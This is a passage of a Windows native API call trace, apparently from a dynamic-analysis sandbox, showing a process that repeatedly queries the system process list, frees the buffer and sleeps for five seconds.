Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.733] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.750] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.767] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.779] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.795] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.811] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.826] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.841] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.857] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.873] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.889] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.904] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.937] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.951] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.970] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.982] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0130.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0130.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0130.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0130.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0130.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0130.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0130.998] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.013] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.029] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.046] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.061] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.087] 